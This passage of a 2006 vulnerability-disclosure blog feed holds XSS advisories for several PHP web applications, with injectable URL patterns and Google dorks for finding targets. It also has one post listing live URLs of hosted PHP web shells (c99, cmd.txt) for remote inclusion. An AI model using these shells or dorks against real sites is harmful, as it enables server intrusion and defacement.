/&gt;notes:&lt;br /&gt;----------------------------&lt;br /&gt;The vendor has been informed.&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114496452639280500?l=d4igoro.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/114496452639280500/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=25894414&amp;postID=114496452639280500' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114496452639280500'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114496452639280500'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/2006/04/powerclan-114-sql-injection.html' title='PowerClan 1.14 - SQL Injection'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-25894414.post-114495457880196737</id><published>2006-04-13T11:53:00.000-07:00</published><updated>2006-04-13T12:00:17.390-07:00</updated><title type='text'>planetSearch+ - XSS Vulnerabilities</title><content type='html'>&lt;code&gt;&lt;br /&gt;planetSearch+ - XSS Vulnerabilities&lt;br /&gt;--------------------------------------------------------&lt;br /&gt;Software: planetSearch+&lt;br /&gt;Version: 26.10.2005&lt;br /&gt;Type: Cross Site Scripting Vulnerability&lt;br /&gt;Date: Apr 13 20:44:54 CEST 2006&lt;br /&gt;Vendor: PlaNet Concept e.K.&lt;br /&gt;Page: http://www.planetc.de&lt;br /&gt;Risc: Low&lt;br /&gt;&lt;br /&gt;credits:&lt;br /&gt;----------------------------&lt;br /&gt;d4igoro - d4igoro[at]gmail[dot]com&lt;br /&gt;http://d4igoro.blogspot.com/&lt;br /&gt;Greetz: kara &amp; hm&lt;br /&gt;&lt;br /&gt;vulnerability:&lt;br /&gt;----------------------------&lt;br /&gt;http://[target]/planetsearchplus.php?search_exp=[XSS]&lt;br /&gt;&lt;br /&gt;solution:&lt;br /&gt;----------------------------&lt;br /&gt;planetsearchplus.php&lt;br /&gt;fix $search_exp&lt;br /&gt;&lt;br /&gt;notes:&lt;br /&gt;----------------------------&lt;br /&gt;The vendor has been informed.&lt;br /&gt;&lt;br /&gt;googledork:&lt;br /&gt;----------------------------&lt;br /&gt;intitle:"planetSearch+"&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114495457880196737?l=d4igoro.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/114495457880196737/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=25894414&amp;postID=114495457880196737' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114495457880196737'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114495457880196737'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/2006/04/planetsearch-xss-vulnerabilities.html' title='planetSearch+ - XSS Vulnerabilities'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-25894414.post-114479493337522664</id><published>2006-04-11T15:27:00.000-07:00</published><updated>2006-04-11T15:46:07.150-07:00</updated><title type='text'>latest php-shells i found</title><content type='html'>http://doudak.persiangig.com/cs.ipg?&amp;cmd=id&lt;br /&gt;http://www.deltashadowforce.com/includes/c?cmd=id&lt;br /&gt;http://sonorauto.com.br/tool25.gif&lt;br /&gt;http://spyval.com/cse.gif&lt;br /&gt;http://tools.kit.net/cmd.txt&lt;br /&gt;http://ecidade.com.br/images/xpl/lila.jpg&lt;br /&gt;http://hackervend3r.tripod.com/oke.txt&lt;br /&gt;http://hitam-putih.info/saben.jpg&lt;br /&gt;http://kicflex.com/image/.nd/c99last.txt&lt;br /&gt;http://www.nicwilson0.plus.com/temp/reel.txt&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114479493337522664?l=d4igoro.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/114479493337522664/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=25894414&amp;postID=114479493337522664' title='10 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114479493337522664'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114479493337522664'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/2006/04/latest-php-shells-i-found.html' title='latest php-shells i found'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-25894414.post-114478713960033610</id><published>2006-04-11T13:25:00.000-07:00</published><updated>2006-04-11T13:25:39.610-07:00</updated><title type='text'>Tritanium Bulletin Board 1.2.3 - XSS</title><content type='html'>&lt;code&gt;&lt;br /&gt;Tritanium Bulletin Board 1.2.3 - XSS Vulnerabilities&lt;br /&gt;--------------------------------------------------------&lt;br /&gt;Software: Tritanium Bulletin Board 1.2.3 &lt;br /&gt;Version: 1.2.3&lt;br /&gt;Type: Cross Site Scripting Vulnerability&lt;br /&gt;Date: Die Apr 11 21:57:50 CEST 2006&lt;br /&gt;Vendor: tritanium&lt;br /&gt;Page: http://www.tritanium-scripts.com/&lt;br /&gt;Risc: Low&lt;br /&gt;&lt;br /&gt;credits:&lt;br /&gt;----------------------------&lt;br /&gt;d4igoro - d4igoro[at]gmail[dot]com&lt;br /&gt;http://d4igoro.blogspot.com/&lt;br /&gt;&lt;br /&gt;vulnerability:&lt;br /&gt;----------------------------&lt;br /&gt;register_globals On&lt;br /&gt;&lt;br /&gt;http://[target]/index.php?faction=register&amp;newuser_name=[XSS]&lt;br /&gt;http://[target]/index.php?faction=register&amp;newuser_email=[XSS]&lt;br /&gt;http://[target]/index.php?faction=register&amp;newuser_hp=[XSS]&lt;br /&gt;&lt;br /&gt;solution:&lt;br /&gt;----------------------------&lt;br /&gt;register.php&lt;br /&gt;line 26-33 : better validating&lt;br /&gt;&lt;br /&gt;notes:&lt;br /&gt;----------------------------&lt;br /&gt;The vendor has been informed.&lt;br /&gt;&lt;br /&gt;googledork:&lt;br /&gt;----------------------------&lt;br /&gt;"2001/2002 Tritanium Scripts"&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114478713960033610?l=d4igoro.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/114478713960033610/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=25894414&amp;postID=114478713960033610' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114478713960033610'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114478713960033610'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/2006/04/tritanium-bulletin-board-123-xss.html' title='Tritanium Bulletin Board 1.2.3 - XSS'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-25894414.post-114478277784822934</id><published>2006-04-11T12:10:00.000-07:00</published><updated>2006-04-11T12:45:06.136-07:00</updated><title type='text'>Manila - XSS Vulnerabilities</title><content type='html'>&lt;code&gt;&lt;br /&gt;Manila  &lt;= 9.5 - XSS Vulnerabilities&lt;br /&gt;--------------------------------------------------------&lt;br /&gt;Software: Manila&lt;br /&gt;Version: &lt;= 9.5&lt;br /&gt;Type: Cross Side Scripting Vulnerability&lt;br /&gt;Date: Die Apr 11 21:33:54 CEST 2006&lt;br /&gt;Vendor: UserLand Software&lt;br /&gt;Page: http://manila.userland.com/&lt;br /&gt;Risc: Middle&lt;br /&gt;&lt;br /&gt;credits:&lt;br /&gt;----------------------------&lt;br /&gt;d4igoro - d4igoro[at]gmail[dot]com&lt;br /&gt;http://d4igoro.blogspot.com/&lt;br /&gt;&lt;br /&gt;vulnerability:&lt;br /&gt;----------------------------&lt;br /&gt;http://[target]/discuss/msgReader$1?mode=[XSS]&lt;br /&gt;http://[target]/newsItems/viewDepartment$[XSS]&lt;br /&gt;&lt;br /&gt;solution:&lt;br /&gt;----------------------------&lt;br /&gt;There isn't a solution yet.&lt;br /&gt;&lt;br /&gt;notes:&lt;br /&gt;----------------------------&lt;br /&gt;At the time of posting no known official patches are available for this vulnerability.&lt;br /&gt;The vendor has been informed.&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114478277784822934?l=d4igoro.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/114478277784822934/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=25894414&amp;postID=114478277784822934' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114478277784822934'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114478277784822934'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/2006/04/manila-xss-vulnerabilities.html' title='Manila - XSS Vulnerabilities'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><thr:total>7</thr:total></entry></feed>
